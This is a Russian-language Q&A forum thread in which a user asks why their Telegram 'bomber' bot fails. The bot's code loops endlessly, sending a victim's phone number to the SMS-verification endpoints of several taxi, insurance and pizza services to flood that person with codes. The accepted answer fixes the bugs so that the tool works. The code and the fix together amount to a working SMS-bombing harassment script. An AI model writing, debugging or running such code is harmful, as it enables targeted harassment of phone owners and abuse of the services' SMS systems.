@Snowdevil

Бот телеграмм не отправляет код с сайта, что не так?

Все работает, ошибок нет. Но бот не отправляет выдает сообщение о том что код не отправлен. Перепробовал уже взять данные с около 20 сайтов, и все тоже самое, говорил не отправлено.

import telebot, requests, fake_useragent, time

bot = telebot.TeleBot('token')

user = fake_useragent.UserAgent().random
headers = {'user_agent' : user}

@bot.message_handler(content_types=['text'])
def get_text_messages(message):
	if message.text == '/start':
		user = fake_useragent.UserAgent().random
		headers = {'user_agent' : user}
		bot.send_message(message.from_user.id, "Введите номер телефона. Пример: 79xxxxxxxxx")
		number = bot.register_next_step_handler(message, bomber)
		
def bomber(message):
        while True:
                user = fake_useragent.UserAgent().random
                headers = {'user_agent' : user}
                try:
                        requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber': number,'countryCode': 'ID','name': 'test','email': 'mail@mail.com','deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})
                        bot.send_message(message.from_user.id, '[+] Grab отправлено!')
                except:
                        bot.send_message(message.from_user.id, '[-] Grab не отправлено!')

                

                try:
                        requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': number}).json()["res"]
                        bot.send_message(message.from_user.id, '[+] RuTaxi отправлено!')
                except:
                        bot.send_message(message.from_user.id, '[-] RuTaxi не отправлено!')

                try:
                        response = requests.post('https://shop.vsk.ru/ajax/auth/postSms/', headers = headers, data = {'phone' : number})
                        bot.send_message(message.from_user.id, '[+] VSK Отправлено')
                except:
                        bot.send_message(message.from_user.id, '[-] VSK Не отправлено')

                try:
                        response = requests.post('https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode', headers = headers, data = {'telephone_t' : '8' + number[1:]})
                        bot.send_message(message.from_user.id, '[+] PANPIZZA Отправлено')
                except:
                       bot.send_message(message.from_user.id, '[-] PANPIZZA Не отправлено')
  • Вопрос задан
  • 111 просмотров
Решения вопроса 1
jerwright
@jerwright
while True: coding()
Скорее всего вы неправильно используете bot.register_next_step_handler. Вы привязываете его к отправленной команде, а нужно к сообщению с просьбой указать номер:
msg = bot.send_message(message.from_user.id, "Введите номер телефона. Пример: 79xxxxxxxxx")
number = bot.register_next_step_handler(msg, bomber)


Также нужно добавить в функцию переменную number, так как вы его используете. Это будет текст сообщения пользователя (номер, который вы запрашиваете у пользователя):
def bomber(message):
	while True:
		number = message.text
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы